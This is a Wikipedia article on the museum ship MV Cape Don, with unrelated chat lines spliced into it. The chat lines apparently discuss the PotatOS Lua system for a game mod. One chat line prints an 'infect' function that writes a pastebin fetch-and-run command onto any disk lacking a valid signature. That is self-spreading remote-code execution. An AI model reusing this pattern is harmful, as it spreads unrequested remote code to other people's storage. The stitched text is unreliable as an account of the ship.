MV Cape Don

MV Cape Don is a former lighthouse tender, now a museum ship in Waverton, New South Wales, Australia.

MV Cape Don in 2014
History
Australia
Name: Cape Don
Namesake: Cape Don Light
Owner: Sea Heritage Foundation Pty Limited[1]
Route: Australian coast
Builder: State Dockyard, Newcastle, New South Wales
Laid down: 1962
Launched: 1962
Completed: 1963
Maiden voyage: 29 March 1963
In service: 1963
Out of service: 1990
Homeport: Fremantle
Identification:
Status: Museum Ship
General characteristics
Type: Lighthouse tender
Tonnage: 2,103 GRT
Length: 74.3 metres (244 ft)
Beam: 12.8 metres (42 ft)
Draught: 4.37 metres (14.3 ft)
Installed power: 2,000 brake horsepower (1,500 kW)
Propulsion: Polar M65T engine, 4-blade 2.6-metre (8 ft 6 in) variable-pitch propeller
Speed: 12.5 knots (23.2 km/h)
Complement: 39

Built and launched by the State Dockyard at Newcastle, New South Wales in 1962 for the Commonwealth Lighthouse Service, she serviced the lighthouses, lightships and buoys of the Australian coast from 1963 to the early 1990s. She is being restored by the labour of enthusiasts to become a museum and training ship. She is listed on the Australian Register of Historic Vessels. She is currently berthed at the former coal loading wharf in Balls Head Bay, Waverton, New South Wales. As of 2019 the restoration project is proceeding well.

Service history

In 1973, the Cape Don assisted in the recovery of two anchors which were jettisoned in 1803 from HMS Investigator whilst under the command of Matthew Flinders.[2][3] In 1987 she transported the tower of the former lighthouse from the Neptune Islands to Port Adelaide for inclusion in the collection of the South Australian Maritime Museum.[4]

gollark: If you have the private key, you can generate signatures for any startup. You don't, though. The stuff written onto disks *also* has a UUID embedded (on the more complex ones), which is part of the signed bit.
gollark: The signatures are programatically generated from the contents of the file and my private key. PotatOS has the *public* key, so it can verify that the signature was generated from the corresponding private key.
gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```

See also

References

  1. "Sea Heritage Foundation". The MV Cape Don Society Inc. Retrieved 3 August 2014.
  2. "MV Cape Don on the Australian Register of Historic Vessels". emuseum.anmm.gov.au. Retrieved 27 June 2011.
  3. Christopher, P; Cundell, N, eds. (2004). Let's Go For a Dive, 50 years of the Underwater Explorers Club of SA. Kent Town, SA: Peter Christopher. pp. 45–49. This describes the search for and recovery of the anchors by members of the Underwater Explorers Club of South Australia.
  4. Harry, Bruce (1987). "Conservation of the former Neptune Islands Lighthouse at Port Adelaide". ICCM Bulletin. Australian Institute for the Conservation of Cultural Material. 13 (1 & 2): 83. Retrieved 21 March 2013.

33°50′39″S 151°11′36″E

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.